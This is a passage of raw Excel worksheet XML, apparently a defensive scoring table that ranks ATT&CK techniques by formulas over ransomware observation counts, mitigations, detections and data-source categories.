        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ158" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>97.015150650793672</v>
      </c>
      <c r="AR158" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS158" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT158" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU15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7.0010821893424042</v>
      </c>
    </row>
    <row r="159" spans="1:47" ht="34">
      <c r="A159" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.53333333333333333</v>
      </c>
      <c r="B159" s="37">
        <f t="shared" si="2"/>
        <v>422.69938199999996</v>
      </c>
      <c r="C159" s="37" t="s">
        <v>577</v>
      </c>
      <c r="D159" s="50" t="s">
        <v>578</v>
      </c>
      <c r="E159" s="37"/>
      <c r="F159" s="37">
        <v>1</v>
      </c>
      <c r="G159" s="37">
        <v>1</v>
      </c>
      <c r="H159" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I159" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J159" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K159" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L159" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M159" s="37">
        <v>0.44734200000000002</v>
      </c>
      <c r="N159" s="56">
        <v>2</v>
      </c>
      <c r="O159" s="56">
        <v>14</v>
      </c>
      <c r="P159" s="56">
        <v>7</v>
      </c>
      <c r="Q159" s="56">
        <v>5</v>
      </c>
      <c r="R159" s="57"/>
      <c r="S159" s="57">
        <v>0</v>
      </c>
      <c r="T159" s="57"/>
      <c r="U159" s="57">
        <v>0</v>
      </c>
      <c r="V159" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W159" s="37">
        <v>0</v>
      </c>
      <c r="X159" s="37">
        <v>0</v>
      </c>
      <c r="Y159" s="37">
        <v>0</v>
      </c>
      <c r="Z159" s="37">
        <v>28</v>
      </c>
      <c r="AA159" s="37">
        <v>0.28000000000000003</v>
      </c>
      <c r="AB159" s="37">
        <v>0.28000000000000003</v>
      </c>
      <c r="AC159" s="37"/>
      <c r="AD159" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE159" s="37" t="str" cm="1">
        <f t="array" ref="AE159">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD159)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF159" s="37">
        <v>155</v>
      </c>
      <c r="AG159" s="37" t="str" cm="1">
        <f t="array" ref="AG159">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD159)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH159" s="37">
        <v>155</v>
      </c>
      <c r="AI159" s="37" t="str" cm="1">
        <f t="array" ref="AI159">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD159)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ159" s="37">
        <v>155</v>
      </c>
      <c r="AK159" s="37" t="str" cm="1">
        <f t="array" ref="AK159">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD159)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL159" s="37">
        <v>155</v>
      </c>
      <c r="AM159" s="37" t="str" cm="1">
        <f t="array" ref="AM159">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD159)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN159" s="37">
        <v>0</v>
      </c>
      <c r="AO159" s="37">
        <v>7</v>
      </c>
      <c r="AP159" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.53333333333333333</v>
      </c>
      <c r="AQ159" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>140.89979399999999</v>
      </c>
      <c r="AR159" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS159" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AT159" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AU15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23.649965666666667</v>
      </c>
    </row>
    <row r="160" spans="1:47" ht="34">
      <c r="A160" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.56666666666666665</v>
      </c>
      <c r="B160" s="37">
        <f t="shared" si="2"/>
        <v>237.43348214285712</v>
      </c>
      <c r="C160" s="37" t="s">
        <v>579</v>
      </c>
      <c r="D160" s="50" t="s">
        <v>580</v>
      </c>
      <c r="E160" s="37"/>
      <c r="F160" s="37">
        <v>2</v>
      </c>
      <c r="G160" s="37">
        <v>3</v>
      </c>
      <c r="H160" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I160" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J160" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K160" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L160" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M160" s="37">
        <v>5.8465000000000003E-2</v>
      </c>
      <c r="N160" s="56">
        <v>0</v>
      </c>
      <c r="O160" s="56">
        <v>12</v>
      </c>
      <c r="P160" s="56">
        <v>2</v>
      </c>
      <c r="Q160" s="56">
        <v>1</v>
      </c>
      <c r="R160" s="57"/>
      <c r="S160" s="57">
        <v>0</v>
      </c>
      <c r="T160" s="57"/>
      <c r="U160" s="57">
        <v>0</v>
      </c>
      <c r="V160" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>7.1428571428571425E-2</v>
      </c>
      <c r="W160" s="37">
        <v>0</v>
      </c>
      <c r="X160" s="37">
        <v>0</v>
      </c>
      <c r="Y160" s="37">
        <v>0</v>
      </c>
      <c r="Z160" s="37">
        <v>15</v>
      </c>
      <c r="AA160" s="37">
        <v>0.15</v>
      </c>
      <c r="AB160" s="37">
        <v>0.15</v>
      </c>
      <c r="AC160" s="37"/>
      <c r="AD160" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE160" s="37" t="str" cm="1">
        <f t="array" ref="AE160">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD160)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF160" s="37">
        <v>156</v>
      </c>
      <c r="AG160" s="37" t="str" cm="1">
        <f t="array" ref="AG160">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD160)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH160" s="37">
        <v>156</v>
      </c>
      <c r="AI160" s="37" t="str" cm="1">
        <f t="array" ref="AI160">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD160)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ160" s="37">
        <v>156</v>
      </c>
      <c r="AK160" s="37" t="str" cm="1">
        <f t="array" ref="AK160">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD160)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL160" s="37">
        <v>156</v>
      </c>
      <c r="AM160" s="37" t="str" cm="1">
        <f t="array" ref="AM160">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD160)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN160" s="37">
        <v>0</v>
      </c>
      <c r="AO160" s="37">
        <v>8</v>
      </c>
      <c r="AP160" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.56666666666666665</v>
      </c>
      <c r="AQ160" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>79.144494047619034</v>
      </c>
      <c r="AR160" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS160" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AT160" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AU16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15.265617913832196</v>
      </c>
    </row>
    <row r="161" spans="1:47" ht="34">
      <c r="A161" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B161" s="37">
        <f t="shared" si="2"/>
        <v>299.3145022857143</v>
      </c>
      <c r="C161" s="37" t="s">
        <v>581</v>
      </c>
      <c r="D161" s="50" t="s">
        <v>582</v>
      </c>
      <c r="E161" s="37"/>
      <c r="F161" s="37">
        <v>1</v>
      </c>
      <c r="G161" s="37">
        <v>1</v>
      </c>
      <c r="H161" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I161" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J161" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K161" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L161" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M161" s="37">
        <v>0.10442899999999999</v>
      </c>
      <c r="N161" s="56">
        <v>0</v>
      </c>
      <c r="O161" s="56">
        <v>12</v>
      </c>
      <c r="P161" s="56">
        <v>4</v>
      </c>
      <c r="Q161" s="56">
        <v>27</v>
      </c>
      <c r="R161" s="57" t="s">
        <v>583</v>
      </c>
      <c r="S161" s="57">
        <v>4</v>
      </c>
      <c r="T161" s="57" t="s">
        <v>584</v>
      </c>
      <c r="U161" s="57">
        <v>3</v>
      </c>
      <c r="V161" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.2714287142857143</v>
      </c>
      <c r="W161" s="37">
        <v>7</v>
      </c>
      <c r="X161" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y161" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z161" s="37">
        <v>43</v>
      </c>
      <c r="AA161" s="37">
        <v>0.43</v>
      </c>
      <c r="AB161" s="37">
        <v>0.43</v>
      </c>
      <c r="AC161" s="37"/>
      <c r="AD161" s="50" t="s">
        <v>585</v>
      </c>
      <c r="AE161" s="37" t="str" cm="1">
        <f t="array" ref="AE161">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD161)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF161" s="37">
        <v>157</v>
      </c>
      <c r="AG161" s="37" t="str" cm="1">
        <f t="array" ref="AG161">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD161)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH161" s="37">
        <v>157</v>
      </c>
      <c r="AI161" s="37" t="str" cm="1">
        <f t="array" ref="AI161">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD161)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ161" s="37">
        <v>157</v>
      </c>
      <c r="AK161" s="37" t="str" cm="1">
        <f t="array" ref="AK161">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD161)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL161" s="37">
        <v>157</v>
      </c>
      <c r="AM161" s="37" t="str" cm="1">
        <f t="array" ref="AM161">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD161)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN161" s="37">
        <v>0</v>
      </c>
      <c r="AO161" s="37">
        <v>4</v>
      </c>
      <c r="AP161" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ161" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>99.771500761904761</v>
      </c>
      <c r="AR161" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS161" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT161" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU16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9.5972857868480723</v>
      </c>
    </row>
    <row r="162" spans="1:47" ht="51">
      <c r="A162" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B162" s="37">
        <f t="shared" si="2"/>
        <v>177.8429475714286</v>
      </c>
      <c r="C162" s="37" t="s">
        <v>586</v>
      </c>
      <c r="D162" s="50" t="s">
        <v>582</v>
      </c>
      <c r="E162" s="37" t="s">
        <v>587</v>
      </c>
      <c r="F162" s="37">
        <v>1</v>
      </c>
      <c r="G162" s="37">
        <v>1</v>
      </c>
      <c r="H162" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I162" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J162" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K162" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L162" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M162" s="37">
        <v>0</v>
      </c>
      <c r="N162" s="56">
        <v>2</v>
      </c>
      <c r="O162" s="56">
        <v>11</v>
      </c>
      <c r="P162" s="56">
        <v>0</v>
      </c>
      <c r="Q162" s="56">
        <v>11</v>
      </c>
      <c r="R162" s="57" t="s">
        <v>583</v>
      </c>
      <c r="S162" s="57">
        <v>4</v>
      </c>
      <c r="T162" s="57" t="s">
        <v>584</v>
      </c>
      <c r="U162" s="57">
        <v>3</v>
      </c>
      <c r="V162" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18095252380952381</v>
      </c>
      <c r="W162" s="37">
        <v>7</v>
      </c>
      <c r="X162" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y162" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z162" s="37">
        <v>24</v>
      </c>
      <c r="AA162" s="37">
        <v>0.24</v>
      </c>
      <c r="AB162" s="37">
        <v>0.24</v>
      </c>
      <c r="AC162" s="37"/>
      <c r="AD162" s="50" t="s">
        <v>588</v>
      </c>
      <c r="AE162" s="37" t="str" cm="1">
        <f t="array" ref="AE162">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD162)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF162" s="37">
        <v>158</v>
      </c>
      <c r="AG162" s="37" t="str" cm="1">
        <f t="array" ref="AG162">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD162)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH162" s="37">
        <v>158</v>
      </c>
      <c r="AI162" s="37" t="str" cm="1">
        <f t="array" ref="AI162">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD162)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ162" s="37">
        <v>158</v>
      </c>
      <c r="AK162" s="37" t="str" cm="1">
        <f t="array" ref="AK162">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD162)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL162" s="37">
        <v>158</v>
      </c>
      <c r="AM162" s="37" t="str" cm="1">
        <f t="array" ref="AM162">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD162)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN162" s="37">
        <v>0</v>
      </c>
      <c r="AO162" s="37">
        <v>0</v>
      </c>
      <c r="AP162" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ162" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>59.280982523809534</v>
      </c>
      <c r="AR162" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS162" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT162" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU16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63" spans="1:47" ht="68">
      <c r="A163" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B163" s="37">
        <f t="shared" si="2"/>
        <v>218.40009100000003</v>
      </c>
      <c r="C163" s="37" t="s">
        <v>589</v>
      </c>
      <c r="D163" s="50" t="s">
        <v>582</v>
      </c>
      <c r="E163" s="37" t="s">
        <v>590</v>
      </c>
      <c r="F163" s="37">
        <v>1</v>
      </c>
      <c r="G163" s="37">
        <v>1</v>
      </c>
      <c r="H163" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I163" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J163" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K163" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L163" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M163" s="37">
        <v>0</v>
      </c>
      <c r="N163" s="56">
        <v>2</v>
      </c>
      <c r="O163" s="56">
        <v>15</v>
      </c>
      <c r="P163" s="56">
        <v>1</v>
      </c>
      <c r="Q163" s="56">
        <v>19</v>
      </c>
      <c r="R163" s="57" t="s">
        <v>583</v>
      </c>
      <c r="S163" s="57">
        <v>4</v>
      </c>
      <c r="T163" s="57" t="s">
        <v>584</v>
      </c>
      <c r="U163" s="57">
        <v>3</v>
      </c>
      <c r="V163" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.24285728571428572</v>
      </c>
      <c r="W163" s="37">
        <v>7</v>
      </c>
      <c r="X163" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y163" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z163" s="37">
        <v>37</v>
      </c>
      <c r="AA163" s="37">
        <v>0.37</v>
      </c>
      <c r="AB163" s="37">
        <v>0.37</v>
      </c>
      <c r="AC163" s="37"/>
      <c r="AD163" s="50" t="s">
        <v>591</v>
      </c>
      <c r="AE163" s="37" t="str" cm="1">
        <f t="array" ref="AE163">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD163)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF163" s="37">
        <v>159</v>
      </c>
      <c r="AG163" s="37" t="str" cm="1">
        <f t="array" ref="AG163">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD163)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH163" s="37">
        <v>159</v>
      </c>
      <c r="AI163" s="37" t="str" cm="1">
        <f t="array" ref="AI163">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD163)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ163" s="37">
        <v>159</v>
      </c>
      <c r="AK163" s="37" t="str" cm="1">
        <f t="array" ref="AK163">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD163)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL163" s="37">
        <v>159</v>
      </c>
      <c r="AM163" s="37" t="str" cm="1">
        <f t="array" ref="AM163">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD163)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN163" s="37">
        <v>0</v>
      </c>
      <c r="AO163" s="37">
        <v>0</v>
      </c>
      <c r="AP163" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ163" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>72.800030333333339</v>
      </c>
      <c r="AR163" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS163" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT163" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU16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64" spans="1:47" ht="34">
      <c r="A164" s="37">
